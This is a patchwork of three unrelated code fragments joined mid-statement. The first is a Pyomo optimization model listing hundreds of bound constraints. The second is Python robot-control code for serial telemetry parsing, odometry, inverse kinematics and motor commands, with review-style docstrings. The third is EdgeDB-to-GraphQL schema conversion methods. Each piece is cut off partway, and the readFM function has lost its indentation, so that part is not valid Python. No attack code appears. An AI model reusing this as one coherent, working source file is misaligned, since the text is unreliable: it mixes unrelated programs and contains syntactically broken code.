m.c5198 = Constraint(expr= m.x6667 - 360*m.b7098 <= 0)
m.c5199 = Constraint(expr= m.x6668 - 360*m.b7097 <= 0)
m.c5200 = Constraint(expr= m.x6669 - 360*m.b7098 <= 0)
m.c5201 = Constraint(expr= m.x6670 - 360*m.b7102 <= 0)
m.c5202 = Constraint(expr= m.x6671 - 360*m.b7101 <= 0)
m.c5203 = Constraint(expr= m.x6672 - 360*m.b7102 <= 0)
m.c5204 = Constraint(expr= m.x6673 - 360*m.b7100 <= 0)
m.c5205 = Constraint(expr= m.x6674 - 360*m.b7101 <= 0)
m.c5206 = Constraint(expr= m.x6675 - 360*m.b7102 <= 0)
m.c5207 = Constraint(expr= m.x6676 - 360*m.b7105 <= 0)
m.c5208 = Constraint(expr= m.x6677 - 360*m.b7104 <= 0)
m.c5209 = Constraint(expr= m.x6678 - 360*m.b7105 <= 0)
m.c5210 = Constraint(expr= m.x6679 - 360*m.b7103 <= 0)
m.c5211 = Constraint(expr= m.x6680 - 360*m.b7104 <= 0)
m.c5212 = Constraint(expr= m.x6681 - 360*m.b7105 <= 0)
# bound 360 on x6730..x6745
m.c5213 = Constraint(expr= m.x6730 - 360*m.b7142 <= 0)
m.c5214 = Constraint(expr= m.x6731 - 360*m.b7146 <= 0)
m.c5215 = Constraint(expr= m.x6732 - 360*m.b7145 <= 0)
m.c5216 = Constraint(expr= m.x6733 - 360*m.b7146 <= 0)
m.c5217 = Constraint(expr= m.x6734 - 360*m.b7150 <= 0)
m.c5218 = Constraint(expr= m.x6735 - 360*m.b7149 <= 0)
m.c5219 = Constraint(expr= m.x6736 - 360*m.b7150 <= 0)
m.c5220 = Constraint(expr= m.x6737 - 360*m.b7148 <= 0)
m.c5221 = Constraint(expr= m.x6738 - 360*m.b7149 <= 0)
m.c5222 = Constraint(expr= m.x6739 - 360*m.b7150 <= 0)
m.c5223 = Constraint(expr= m.x6740 - 360*m.b7153 <= 0)
m.c5224 = Constraint(expr= m.x6741 - 360*m.b7152 <= 0)
m.c5225 = Constraint(expr= m.x6742 - 360*m.b7153 <= 0)
m.c5226 = Constraint(expr= m.x6743 - 360*m.b7151 <= 0)
m.c5227 = Constraint(expr= m.x6744 - 360*m.b7152 <= 0)
m.c5228 = Constraint(expr= m.x6745 - 360*m.b7153 <= 0)
# bound 365 on x6730..x6745
m.c5229 = Constraint(expr= m.x6730 - 365*m.b7142 <= 0)
m.c5230 = Constraint(expr= m.x6731 - 365*m.b7146 <= 0)
m.c5231 = Constraint(expr= m.x6732 - 365*m.b7145 <= 0)
m.c5232 = Constraint(expr= m.x6733 - 365*m.b7146 <= 0)
m.c5233 = Constraint(expr= m.x6734 - 365*m.b7150 <= 0)
m.c5234 = Constraint(expr= m.x6735 - 365*m.b7149 <= 0)
m.c5235 = Constraint(expr= m.x6736 - 365*m.b7150 <= 0)
m.c5236 = Constraint(expr= m.x6737 - 365*m.b7148 <= 0)
m.c5237 = Constraint(expr= m.x6738 - 365*m.b7149 <= 0)
m.c5238 = Constraint(expr= m.x6739 - 365*m.b7150 <= 0)
m.c5239 = Constraint(expr= m.x6740 - 365*m.b7153 <= 0)
m.c5240 = Constraint(expr= m.x6741 - 365*m.b7152 <= 0)
m.c5241 = Constraint(expr= m.x6742 - 365*m.b7153 <= 0)
m.c5242 = Constraint(expr= m.x6743 - 365*m.b7151 <= 0)
m.c5243 = Constraint(expr= m.x6744 - 365*m.b7152 <= 0)
m.c5244 = Constraint(expr= m.x6745 - 365*m.b7153 <= 0)
# bound 370 on x6634..x6649
m.c5245 = Constraint(expr= m.x6634 - 370*m.b7070 <= 0)
m.c5246 = Constraint(expr= m.x6635 - 370*m.b7074 <= 0)
m.c5247 = Constraint(expr= m.x6636 - 370*m.b7073 <= 0)
m.c5248 = Constraint(expr= m.x6637 - 370*m.b7074 <= 0)
m.c5249 = Constraint(expr= m.x6638 - 370*m.b7078 <= 0)
m.c5250 = Constraint(expr= m.x6639 - 370*m.b7077 <= 0)
m.c5251 = Constraint(expr= m.x6640 - 370*m.b7078 <= 0)
m.c5252 = Constraint(expr= m.x6641 - 370*m.b7076 <= 0)
m.c5253 = Constraint(expr= m.x6642 - 370*m.b7077 <= 0)
m.c5254 = Constraint(expr= m.x6643 - 370*m.b7078 <= 0)
m.c5255 = Constraint(expr= m.x6644 - 370*m.b7081 <= 0)
m.c5256 = Constraint(expr= m.x6645 - 370*m.b7080 <= 0)
m.c5257 = Constraint(expr= m.x6646 - 370*m.b7081 <= 0)
m.c5258 = Constraint(expr= m.x6647 - 370*m.b7079 <= 0)
m.c5259 = Constraint(expr= m.x6648 - 370*m.b7080 <= 0)
m.c5260 = Constraint(expr= m.x6649 - 370*m.b7081 <= 0)
# bound 380 on x6666..x6681
m.c5261 = Constraint(expr= m.x6666 - 380*m.b7094 <= 0)
m.c5262 = Constraint(expr= m.x6667 - 380*m.b7098 <= 0)
m.c5263 = Constraint(expr= m.x6668 - 380*m.b7097 <= 0)
m.c5264 = Constraint(expr= m.x6669 - 380*m.b7098 <= 0)
m.c5265 = Constraint(expr= m.x6670 - 380*m.b7102 <= 0)
m.c5266 = Constraint(expr= m.x6671 - 380*m.b7101 <= 0)
m.c5267 = Constraint(expr= m.x6672 - 380*m.b7102 <= 0)
m.c5268 = Constraint(expr= m.x6673 - 380*m.b7100 <= 0)
m.c5269 = Constraint(expr= m.x6674 - 380*m.b7101 <= 0)
m.c5270 = Constraint(expr= m.x6675 - 380*m.b7102 <= 0)
m.c5271 = Constraint(expr= m.x6676 - 380*m.b7105 <= 0)
m.c5272 = Constraint(expr= m.x6677 - 380*m.b7104 <= 0)
m.c5273 = Constraint(expr= m.x6678 - 380*m.b7105 <= 0)
m.c5274 = Constraint(expr= m.x6679 - 380*m.b7103 <= 0)
m.c5275 = Constraint(expr= m.x6680 - 380*m.b7104 <= 0)
m.c5276 = Constraint(expr= m.x6681 - 380*m.b7105 <= 0)
# bound 385 on x6666..x6681
m.c5277 = Constraint(expr= m.x6666 - 385*m.b7094 <= 0)
m.c5278 = Constraint(expr= m.x6667 - 385*m.b7098 <= 0)
m.c5279 = Constraint(expr= m.x6668 - 385*m.b7097 <= 0)
m.c5280 = Constraint(expr= m.x6669 - 385*m.b7098 <= 0)
m.c5281 = Constraint(expr= m.x6670 - 385*m.b7102 <= 0)
m.c5282 = Constraint(expr= m.x6671 - 385*m.b7101 <= 0)
m.c5283 = Constraint(expr= m.x6672 - 385*m.b7102 <= 0)
m.c5284 = Constraint(expr= m.x6673 - 385*m.b7100 <= 0)
m.c5285 = Constraint(expr= m.x6674 - 385*m.b7101 <= 0)
m.c5286 = Constraint(expr= m.x6675 - 385*m.b7102 <= 0)
m.c5287 = Constraint(expr= m.x6676 - 385*m.b7105 <= 0)
m.c5288 = Constraint(expr= m.x6677 - 385*m.b7104 <= 0)
m.c5289 = Constraint(expr= m.x6678 - 385*m.b7105 <= 0)
m.c5290 = Constraint(expr= m.x6679 - 385*m.b7103 <= 0)
m.c5291 = Constraint(expr= m.x6680 - 385*m.b7104 <= 0)
m.c5292 = Constraint(expr= m.x6681 - 385*m.b7105 <= 0)
# bound 400 on x6666..x6681
m.c5293 = Constraint(expr= m.x6666 - 400*m.b7094 <= 0)
m.c5294 = Constraint(expr= m.x6667 - 400*m.b7098 <= 0)
m.c5295 = Constraint(expr= m.x6668 - 400*m.b7097 <= 0)
m.c5296 = Constraint(expr= m.x6669 - 400*m.b7098 <= 0)
m.c5297 = Constraint(expr= m.x6670 - 400*m.b7102 <= 0)
m.c5298 = Constraint(expr= m.x6671 - 400*m.b7101 <= 0)
m.c5299 = Constraint(expr= m.x6672 - 400*m.b7102 <= 0)
m.c5300 = Constraint(expr= m.x6673 - 400*m.b7100 <= 0)
m.c5301 = Constraint(expr= m.x6674 - 400*m.b7101 <= 0)
m.c5302 = Constraint(expr= m.x6675 - 400*m.b7102 <= 0)
m.c5303 = Constraint(expr= m.x6676 - 400*m.b7105 <= 0)
m.c5304 = Constraint(expr= m.x6677 - 400*m.b7104 <= 0)
m.c5305 = Constraint(expr= m.x6678 - 400*m.b7105 <= 0)
m.c5306 = Constraint(expr= m.x6679 - 400*m.b7103 <= 0)
m.c5307 = Constraint(expr= m.x6680 - 400*m.b7104 <= 0)
m.c5308 = Constraint(expr= m.x6681 - 400*m.b7105 <= 0)
# bound 405 on x6698..
m.c5309 = Constraint(expr= m.x6698 - 405*m.b7118 <= 0)
m.c5310 = Constraint(expr= m.x6699 - 405*m.b7122 <= 0)
m.c5311 | |
+ hex(self.us_ok) + ', bat_vol_x100 = ' + '{:=4}'.format(int(self.bat_vol_x100)))
print('ps2_button = ' + hex(self.ps2_button) + ', ' + '{:=3}'.format(int(self.ps2_analogRX)) + ', ' + '{:=3}'.format(int(self.ps2_analogRY)) + ', ' + '{:=3}'.format(int(self.ps2_analogLX)) + ', ' + '{:=3}'.format(int(self.ps2_analogLY)))
print('interval_MEGA = ' + '{:=6}'.format(int(self.interval_MEGA)))
def print_wrk(self):
    """Dump the current working command state (mode, body twist command,
    wheel-rate commands) to stdout for debugging."""
    print('arduino.mode = ' + str(self.mode))
    print('dx_cmd = {:=+4}, {:=+4}, {:=+4}'.format(*self.dx_cmd[:3]))
    print('omega_cmd = {:=+4}, {:=+4}, {:=+4}, {:=+4}'.format(*self.omega_cmd[:4]))
    print('omega_cmd_x10 = {:=+4}, {:=+4}, {:=+4}, {:=+4}'.format(*self.omega_cmd_x10[:4]))
def cmd_wrk(self, x, y, th):
    """Advance the host-side sample counter (with wrap-around) and clamp
    the requested pose command (x, y, th) to the configured limits.

    The clamped values are currently only computed locally; the serial
    transmission of the 'wrk' command is disabled (see the commented-out
    write below).
    """
    # Sample counter: pinned at the lower limit, rolls over to 0 at the upper.
    self.sample_num_host += 1
    if self.sample_num_host <= self.sample_num_ll:
        self.sample_num_host = self.sample_num_ll
    elif self.sample_num_host >= self.sample_num_ul:
        self.sample_num_host = 0
    # Saturate each pose component into [x_ll[i], x_ul[i]].
    x = min(max(x, self.x_ll[0]), self.x_ul[0])
    y = min(max(y, self.x_ll[1]), self.x_ul[1])
    th = min(max(th, self.x_ll[2]), self.x_ul[2])
    # print('wrk,' + '{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(x)) + ',' + '{:0=+5}'.format(int(y)) + ',' + '{:0=+5}'.format(int(th)) + ',end')
    # self.con.write('wrk,{:0=3}'.format(int(self.sample_num_host)) + ',' + '{:0=+5}'.format(int(x)) + ',' + '{:0=+5}'.format(int(y)) + ',' + '{:0=+5}'.format(int(th)) + ',end')
def apply_filter(self):
    """One integration step of the sensor filters.

    First-order low-pass on the magnetometer x/y channels (gain g_mag),
    and a first-order high-pass on the z gyro (gain g_gz) together with
    the running integral of the high-passed rate.
    """
    # Low-pass: state += (g_mag * dt) * (input - state)
    alpha = self.g_mag * self.dt
    self.mx_lpf += alpha * (self.mx - self.mx_lpf)
    self.my_lpf += alpha * (self.my - self.my_lpf)
    # High-pass: subtract the integrated output from the raw rate.
    self.gz_hpf_tmp += self.dt * self.gz_hpf
    self.gz_hpf = self.gz - self.g_gz * self.gz_hpf_tmp
    self.int_gz_hpf += self.dt * self.gz_hpf
def odometry_update_res(self):
    """Dead-reckoning pose update from the *measured* wheel speeds.

    Converts the four measured wheel rates to rad/s, maps them through
    J_inv_plus (presumably a pseudo-inverse kinematic matrix -- TODO
    confirm) to a body-frame twist dx_res, and integrates that twist
    into the world-frame pose x_res.
    """
    # omega_res_x10 appears to be in 0.1 deg/s (name *_x10): /10 -> deg/s,
    # * pi/180 -> rad/s, hence the combined factor pi/1800 -- confirm units.
    omega_rad = np.array(
        [ self.omega_res_x10[0] * self.pi / 1800.0
        , self.omega_res_x10[1] * self.pi / 1800.0
        , self.omega_res_x10[2] * self.pi / 1800.0
        , self.omega_res_x10[3] * self.pi / 1800.0
        ])
    # Body-frame twist from wheel rates.
    self.dx_res = np.dot(self.J_inv_plus, omega_rad)
    # Rotate the body-frame velocity into the world frame and integrate x, y.
    self.x_res[0] += self.dt * (self.dx_res[0] * cos(self.x_res[2]) - self.dx_res[1] * sin(self.x_res[2]))
    self.x_res[1] += self.dt * (self.dx_res[0] * sin(self.x_res[2]) + self.dx_res[1] * cos(self.x_res[2]))
    # NOTE(review): this writes to x_res_ (trailing underscore), NOT x_res --
    # it stores the magnetometer-derived heading in a separate attribute while
    # the gyro/odometry heading is integrated below.  Confirm that x_res_ is
    # initialized elsewhere; if the underscore is a typo this silently hides
    # the magnetometer heading (cf. the commented-out fused variant below).
    self.x_res_[2] = atan2(self.my_lpf - self.my_offset, self.mx_lpf - self.mx_offset)
    # self.x_res[2] = atan2(self.my_lpf - self.my_offset, self.mx_lpf - self.mx_offset) + self.int_gz_hpf
    # Heading integrated from the angular component of the twist.
    self.x_res[2] += self.dt * (self.dx_res[2])
def odometry_update_cmd(self):
    """Secondary dead-reckoning pose estimate from the *commanded* velocities.

    Integrates the commanded body-frame twist dx_cmd_x10 (presumably in
    0.1 mm/s and 0.1 deg/s, hence the /10.0 scalings -- TODO confirm)
    into the alternate pose x_res2, rotating through the measured
    heading x_res[2].  Marked "not in use" in the original because
    commanded velocities cannot estimate the pose precisely enough.

    Bug fix: the y-axis update previously used sin() for both rotation
    terms; the second term must use cos() (compare the measurement-based
    update in odometry_update_res).
    """
    vx = self.dx_cmd_x10[0] / 10.0 / 1000.0
    vy = self.dx_cmd_x10[1] / 10.0 / 1000.0
    th = self.x_res[2]
    self.x_res2[0] += self.dt * (vx * cos(th) - vy * sin(th))
    self.x_res2[1] += self.dt * (vx * sin(th) + vy * cos(th))
    self.x_res2[2] += self.dt * (self.dx_cmd_x10[2] / 10.0 * self.pi / 180.0)
def print_odom(self):
    """Print the measured-odometry pose (heading converted to degrees)
    together with the battery voltage."""
    heading_deg = self.x_res[2] / 3.141592 * 180.0
    line = 'OdomRes : {:=7.2f}, {:=7.2f}, {:=7.3f}, Battery = {:=2.2f}'.format(
        self.x_res[0], self.x_res[1], heading_deg, self.bat_vol)
    print(line)
def fwd_kine(self):
    """Reset the body-frame velocity estimate to zero.

    (Despite the name, no forward kinematics is computed here -- the
    three twist components are simply cleared.)
    """
    for axis in range(3):
        self.dx_res[axis] = 0
def rate_limit_work(self):
    """Slew-rate-limit dx_cmd into dx_cmd_rl.

    Each component moves toward the raw command by at most
    dx_rate_limit[i] per call; once within that band it snaps to the
    raw command exactly.
    """
    for i in range(len(self.dx_cmd)):
        target = self.dx_cmd[i]
        limit = self.dx_rate_limit[i]
        current = self.dx_cmd_rl[i]
        if target > current + limit:
            self.dx_cmd_rl[i] = current + limit
        elif target < current - limit:
            self.dx_cmd_rl[i] = current - limit
        else:
            self.dx_cmd_rl[i] = target
def inv_kine(self):
    """Inverse kinematics for the four-wheel base: rate-limited body
    twist dx_cmd_rl -> individual wheel angular velocities omega_cmd.

    base_width, base_length and wheel_radius are divided by 1000.0,
    presumably mm -> m -- confirm against the robot configuration.
    """
    # Loop-invariant geometry, hoisted from the four per-wheel expressions.
    half_frame = (self.base_width + self.base_length) / 1000.0 / 2.0
    radius = self.wheel_radius / 1000.0
    vx = self.dx_cmd_rl[0]
    vy = self.dx_cmd_rl[1]
    wz = self.dx_cmd_rl[2]
    self.omega_cmd[0] = (vx + vy + half_frame * wz) / radius
    self.omega_cmd[1] = (vx - vy - half_frame * wz) / radius
    self.omega_cmd[2] = (vx - vy + half_frame * wz) / radius
    self.omega_cmd[3] = (vx + vy - half_frame * wz) / radius
def command_motor_node(self):
    """Convert the wheel-rate commands to the integer wire format and
    transmit them to the two motor-controller nodes (conFM / conRM).

    rad/s -> tenths of deg/s: * (180/pi) * 10 == * 1800 / pi (the pi
    approximation 3.141592 is kept as-is to match the firmware).
    """
    for i in range(4):
        self.omega_cmd_x10[i] = int(self.omega_cmd[i] / 3.141592 * 1800)
    header = 'vel,{:0=3}'.format(int(self.sample_num_host))
    front = [int(self.ws_dir[i] * self.omega_cmd_x10[i]) for i in (0, 1)]
    rear = [int(self.ws_dir[i] * self.omega_cmd_x10[i]) for i in (2, 3)]
    # Wheels 0/1 go to the FM node, wheels 2/3 to the RM node.
    self.conFM.write(header + ',{:0=+5},{:0=+5},end'.format(*front))
    self.conRM.write(header + ',{:0=+5},{:0=+5},end'.format(*rear))
def readMEGA(self):
    """Drain the MEGA-node serial buffer and parse complete telemetry records.

    A record is one newline-terminated line of exactly 28 comma-separated
    columns.  Every column is validated first; the record is committed to
    the instance attributes only when all 28 columns validate, otherwise
    the bad record is reported and dropped (same behavior as the original
    unrolled implementation, including its error codes).  Any trailing
    partial line is kept in before_nokoriMEGA and prepended to the next
    read.

    NOTE(review): this assumes conMEGA.read() returns str (PySerial 2.x /
    Python 2 style, cf. inWaiting()); under Python 3 the bytes would need
    decoding -- confirm the runtime environment.
    """
    tmp_str = self.conMEGA.read(self.conMEGA.inWaiting())  # drain whatever arrived
    # Stitch the leftover from the previous call onto this read, then split
    # into candidate records on newlines.
    tmp_list = (self.before_nokoriMEGA + tmp_str).split('\n')
    if len(tmp_list) >= 2:
        for line in tmp_list[:-1]:
            fields = line.split(',')
            sample_err = 0
            if len(fields) == 28:
                def from_hex(s):
                    return int(s, 16)
                # (validator, converter) per column.  A column's 1-based
                # index doubles as its error code, matching the previous
                # field-by-field implementation (the last failing column
                # wins, as before).
                spec = (
                    [(is_int, int)]          # 0: sample number
                    + [(is_hex, from_hex)]   # 1: IR bitmask (hex)
                    + [(is_int, int)] * 10   # 2-11: ax..az, gx..gz, mx..mz, temp
                    + [(is_int, float)] * 8  # 12-19: us_dist[0..7]
                    + [(is_hex, from_hex)]   # 20: ultrasonic OK bitmask (hex)
                    + [(is_int, int)]        # 21: battery voltage x100
                    + [(is_hex, from_hex)]   # 22: PS2 button bitmask (hex)
                    + [(is_int, int)] * 5    # 23-27: PS2 sticks + MEGA interval
                )
                values = [0] * 28
                for col, (check, convert) in enumerate(spec):
                    if check(fields[col]):
                        values[col] = convert(fields[col])
                    else:
                        sample_err = col + 1
            else:
                sample_err = 99
            # Commit only fully validated records.
            if sample_err == 0:
                self.sample_num_node_MEGA = values[0]
                self.ir_hex = values[1]
                self.ax, self.ay, self.az = values[2:5]
                # Gyro counts are scaled by the gain gc, as in the original.
                self.gx = self.gc * values[5]
                self.gy = self.gc * values[6]
                self.gz = self.gc * values[7]
                self.mx, self.my, self.mz = values[8:11]
                self.temp = values[11]
                for j in range(8):
                    self.us_dist[j] = values[12 + j]
                self.us_ok = values[20]
                self.bat_vol_x100 = values[21]
                self.bat_vol = self.bat_vol_x100 / 100.0
                self.ps2_button = values[22]
                (self.ps2_analogRX, self.ps2_analogRY,
                 self.ps2_analogLX, self.ps2_analogLY) = values[23:27]
                self.interval_MEGA = values[27]
            else:
                print("Error in read MEGA: " + str(sample_err) + ": ")
                print(line)
    # Save the trailing (unterminated) fragment for the next call.
    self.before_nokoriMEGA = tmp_list[-1]
def readFM(self):
# Initialize variables
err_flag = 0
sample_num_node_FM = 0
cnt_now_0 = 0
cnt_now_1 = 0
omega_res_x10_0 = 0
omega_res_x10_1 = 0
omega_cmd_x10_0 = 0
omega_cmd_x10_1 = 0
vout_0 = 0
vout_1 = 0
interval = 0
# Read serial data & Put it to class
tmp_str = self.conFM.read(self.conFM.inWaiting()) # Read serial data
tmp_list = (self.before_nokoriFM + tmp_str).split('\n') # Connect previous rest sample and this sample -> split by new line char
if len(tmp_list) >= 2:
for i in range(0, len(tmp_list) - 1):
tmp_val_list = tmp_list[i].split(',')
sample_err = 0
if len(tmp_val_list) == 10:
if is_int(tmp_val_list[0]): sample_num_node_FM = int(tmp_val_list[0])
else: sample_err = 1
if is_int(tmp_val_list[1]): cnt_now_0 = int(tmp_val_list[1])
else: sample_err = 1
if is_int(tmp_val_list[2]): cnt_now_1 = int(tmp_val_list[2])
else: sample_err = 1
if is_int(tmp_val_list[3]): omega_res_x10_0 = int(tmp_val_list[3])
else: sample_err = 1
if is_int(tmp_val_list[4]): omega_res_x10_1 = int(tmp_val_list[4])
else: sample_err = 1
if is_int(tmp_val_list[5]): omega_cmd_x10_0 = int(tmp_val_list[5])
else: sample_err = 1
if is_int(tmp_val_list[6]): omega_cmd_x10_1 = int(tmp_val_list[6])
else: sample_err = 1
if is_int(tmp_val_list[7]): vout_0 = int(tmp_val_list[7])
else: sample_err = 1
if is_int(tmp_val_list[8]): vout_1 = int(tmp_val_list[8])
else: sample_err = 1
if is_int(tmp_val_list[9]): interval = int(tmp_val_list[9])
else: sample_err = 1
else:
err_flag = 1
# If error | |
'', f'get_input_name {name=}'
return f'{module}__{inputtype}{shortname}'
else:
return f'{inputtype}{name}'
def gql_to_edb_name(self, name: str) -> str:
    '''Convert the GraphQL field name into an EdgeDB type/view name.

    Only the first '__' separator is significant: 'default__Foo' becomes
    'default::Foo'; names without a separator pass through unchanged.
    '''
    return name.replace('__', '::', 1) if '__' in name else name
def _get_description(self, edb_type: s_types.Type) -> Optional[str]:
    """Return the value of the type's std::description annotation, or
    None when the annotation is not set."""
    anno = edb_type.get_annotations(self.edb_schema).get(
        self.edb_schema, s_name.QualName('std', 'description'), None)
    return None if anno is None else anno.get_value(self.edb_schema)
def _convert_edb_type(
    self,
    edb_target: s_types.Type,
) -> Optional[GraphQLOutputType]:
    """Map an EdgeDB type to its GraphQL output type.

    Returns None when the type (or an array's element type) cannot be
    exposed via GraphQL.  Raises GraphQLCoreError for tuples and for
    scalars with no known GraphQL mapping.

    NOTE: the branch order below is significant -- views and enums must
    be recognized before the more general ObjectType / InheritingType
    checks would match them.
    """
    target: Optional[GraphQLOutputType] = None
    # only arrays can be validly wrapped, other containers don't
    # produce a valid graphql type
    if isinstance(edb_target, s_types.Array):
        subtype = edb_target.get_subtypes(self.edb_schema)[0]
        if str(subtype.get_name(self.edb_schema)) == 'std::json':
            # cannot expose arrays of JSON
            return None
        # Recurse for the element type; arrays become [NonNull(element)].
        el_type = self._convert_edb_type(subtype)
        if el_type is None:
            # we can't expose an array of unexposable type
            return el_type
        else:
            target = GraphQLList(GraphQLNonNull(el_type))
    elif edb_target.is_view(self.edb_schema):
        # Views map to concrete object types, not interfaces.
        tname = edb_target.get_name(self.edb_schema)
        assert isinstance(tname, s_name.QualName)
        target = self._gql_objtypes.get(tname)
    elif isinstance(edb_target, s_objtypes.ObjectType):
        # Prefer the interface; fall back to the concrete object type.
        target = self._gql_interfaces.get(
            edb_target.get_name(self.edb_schema),
            self._gql_objtypes.get(edb_target.get_name(self.edb_schema))
        )
    elif (
        isinstance(edb_target, s_scalars.ScalarType)
        and edb_target.is_enum(self.edb_schema)
    ):
        # Enum scalars map to previously generated GraphQL enums (if any).
        name = self.get_gql_name(edb_target.get_name(self.edb_schema))
        if name in self._gql_enums:
            target = self._gql_enums.get(name)
    elif edb_target.is_tuple(self.edb_schema):
        # Tuples have no GraphQL counterpart at all.
        edb_typename = edb_target.get_verbosename(self.edb_schema)
        raise g_errors.GraphQLCoreError(
            f"Could not convert {edb_typename} to a GraphQL type.")
    elif isinstance(edb_target, s_types.InheritingType):
        # Plain scalars: resolve via the topmost concrete base so that
        # derived scalars inherit their base's GraphQL mapping.
        base_target = edb_target.get_topmost_concrete_base(self.edb_schema)
        bt_name = base_target.get_name(self.edb_schema)
        try:
            target = EDB_TO_GQL_SCALARS_MAP[str(bt_name)]
        except KeyError:
            # this is the scalar base case, where all potentially
            # unrecognized scalars should end up
            edb_typename = edb_target.get_verbosename(self.edb_schema)
            raise g_errors.GraphQLCoreError(
                f"could not convert {edb_typename!r} type to"
                f" a GraphQL type")
    else:
        raise AssertionError(f'unexpected schema object: {edb_target!r}')
    return target
def _get_target(
    self,
    ptr: s_pointers.Pointer,
) -> Optional[GraphQLOutputType]:
    """Return the GraphQL output type for a pointer's target, with the
    List/NonNull wrappers implied by the pointer's cardinality and
    required flag; None when the target is not exposable."""
    edb_target = ptr.get_target(self.edb_schema)
    if edb_target is None:
        raise AssertionError(f'unexpected abstract pointer: {ptr!r}')
    converted = self._convert_edb_type(edb_target)
    if converted is None:
        return None
    return self._wrap_output_type(ptr, converted)
def _wrap_output_type(
    self,
    ptr: s_pointers.Pointer,
    target: GraphQLOutputType,
    *,
    ignore_required: bool = False,
) -> GraphQLOutputType:
    """Apply the GraphQL wrappers implied by the pointer: multi pointers
    become non-null lists, and required pointers gain an outer NonNull
    (unless ignore_required is set)."""
    if not ptr.singular(self.edb_schema):
        target = GraphQLList(GraphQLNonNull(target))
    if ignore_required:
        return target
    if ptr.get_required(self.edb_schema):
        target = GraphQLNonNull(target)
    return target
def _wrap_input_type(
    self,
    ptr: s_pointers.Pointer,
    target: GraphQLInputType,
    *,
    ignore_required: bool = False,
) -> GraphQLInputType:
    """Apply the GraphQL wrappers implied by the pointer to an input
    type.

    Multi pointers become non-null lists.  For input values a declared
    default cancels out being required, so NonNull is only added for
    required pointers without a default (and never when
    ignore_required is set).
    """
    if not ptr.singular(self.edb_schema):
        target = GraphQLList(GraphQLNonNull(target))
    if ignore_required:
        return target
    required = ptr.get_required(self.edb_schema)
    has_default = ptr.get_default(self.edb_schema) is not None
    if required and not has_default:
        target = GraphQLNonNull(target)
    return target
def _get_query_args(
    self,
    typename: s_name.QualName,
) -> Dict[str, GraphQLArgument]:
    """Standard argument set for querying a type: 'filter', 'order' and
    the pagination window (first/last/before/after)."""
    key = str(typename)
    args = {
        'filter': GraphQLArgument(self._gql_inobjtypes[key]),
        'order': GraphQLArgument(self._gql_ordertypes[key]),
    }
    args['first'] = GraphQLArgument(GraphQLInt)
    args['last'] = GraphQLArgument(GraphQLInt)
    # 'before' and 'after' are opaque cursor values serialized to string.
    args['before'] = GraphQLArgument(GraphQLString)
    args['after'] = GraphQLArgument(GraphQLString)
    return args
def _get_insert_args(
    self,
    typename: s_name.QualName,
) -> Dict[str, GraphQLArgument]:
    """Arguments for an insert mutation: a non-null list of input objects.

    Insertion requires a specific non-interface input type; when none
    was generated for this type, return no arguments -- the data input
    would be ambiguous, though selecting existing data still works.
    """
    intype = self._gql_inobjtypes.get(f'Insert{typename}')
    if intype is None:
        return {}
    data_type = GraphQLNonNull(GraphQLList(GraphQLNonNull(intype)))
    return {'data': GraphQLArgument(data_type)}
def _get_update_args(
    self,
    typename: s_name.QualName,
) -> Dict[str, GraphQLArgument]:
    """Arguments for an update mutation: the standard query arguments
    plus a required 'data' payload.

    Types without a generated Update input type have no updates and get
    no arguments at all.
    """
    uptype = self._gql_inobjtypes.get(f'Update{typename}')
    if uptype is None:
        return {}
    return dict(
        self._get_query_args(typename),
        data=GraphQLArgument(GraphQLNonNull(uptype)),
    )
def get_fields(
    self,
    typename: s_name.QualName,
) -> Dict[str, GraphQLField]:
    """Build the GraphQL field map for *typename*.

    Three cases:
    * stdgraphql::Query    -- one list-valued field per queryable
      interface or alias, with the standard query arguments.
    * stdgraphql::Mutation -- delete_*/insert_* fields from concrete
      object types, update_* fields from interfaces that have an
      Update input type.
    * anything else        -- one field per pointer of the EdgeDB
      object type.
    """
    fields = {}
    if str(typename) == 'stdgraphql::Query':
        # The fields here will come from abstract types and aliases.
        queryable: List[Tuple[s_name.QualName, GraphQLNamedType]] = []
        queryable.extend(self._gql_interfaces.items())
        queryable.extend(self._gql_objtypes_from_alias.items())
        # Deterministic field order: sort by the GraphQL type name.
        queryable.sort(key=lambda x: x[1].name)
        for name, gqliface in queryable:
            # '_edb' prefix indicates an internally generated type
            # (e.g. nested aliased type), which should not be
            # exposed as a top-level query option.
            if name in TOP_LEVEL_TYPES or gqliface.name.startswith('_edb'):
                continue
            fields[gqliface.name] = GraphQLField(
                GraphQLList(GraphQLNonNull(gqliface)),
                args=self._get_query_args(name),
            )
    elif str(typename) == 'stdgraphql::Mutation':
        # delete_* / insert_* come from concrete object types...
        for name, gqltype in sorted(self._gql_objtypes.items(),
                                    key=lambda x: x[1].name):
            # '_edb' prefix indicates an internally generated type
            # (e.g. nested aliased type), which should not be
            # exposed as a top-level mutation option.
            if name in TOP_LEVEL_TYPES or gqltype.name.startswith('_edb'):
                continue
            gname = self.get_gql_name(name)
            fields[f'delete_{gname}'] = GraphQLField(
                GraphQLList(GraphQLNonNull(gqltype)),
                args=self._get_query_args(name),
            )
            # Insert is only offered when an Insert input type exists.
            args = self._get_insert_args(name)
            if args:
                fields[f'insert_{gname}'] = GraphQLField(
                    GraphQLList(GraphQLNonNull(gqltype)),
                    args=args,
                )
        # ...while update_* comes from the interfaces.
        for name, gqliface in sorted(self._gql_interfaces.items(),
                                     key=lambda x: x[1].name):
            if (name in TOP_LEVEL_TYPES or
                    gqliface.name.startswith('_edb') or
                    f'Update{name}' not in self._gql_inobjtypes):
                continue
            gname = self.get_gql_name(name)
            args = self._get_update_args(name)
            if args:
                fields[f'update_{gname}'] = GraphQLField(
                    GraphQLList(GraphQLNonNull(gqliface)),
                    args=args,
                )
    else:
        edb_type = self.edb_schema.get(
            typename,
            type=s_objtypes.ObjectType,
        )
        pointers = edb_type.get_pointers(self.edb_schema)
        for unqual_pn, ptr in sorted(pointers.items(self.edb_schema)):
            pn = str(unqual_pn)
            if pn == '__type__':
                continue
            tgt = ptr.get_target(self.edb_schema)
            assert tgt is not None
            # Aliased types ignore their ancestors in order to
            # allow all their fields appear properly in the
            # filters.
            if not tgt.is_view(self.edb_schema):
                # We want to look at the pointer lineage because that
                # will be reflected into GraphQL interface that is
                # being extended and the type cannot be changed.
                lineage = s_objects.compute_lineage(self.edb_schema, ptr)
                # We want the first non-generic ancestor of this
                # pointer as its target type will dictate the target
                # types of all its derived pointers.
                #
                # NOTE: We're guaranteed to have a non-generic one
                # since we're inspecting the lineage of a pointer
                # belonging to an actual type.
                for ancestor in reversed(lineage):
                    if not ancestor.generic(self.edb_schema):
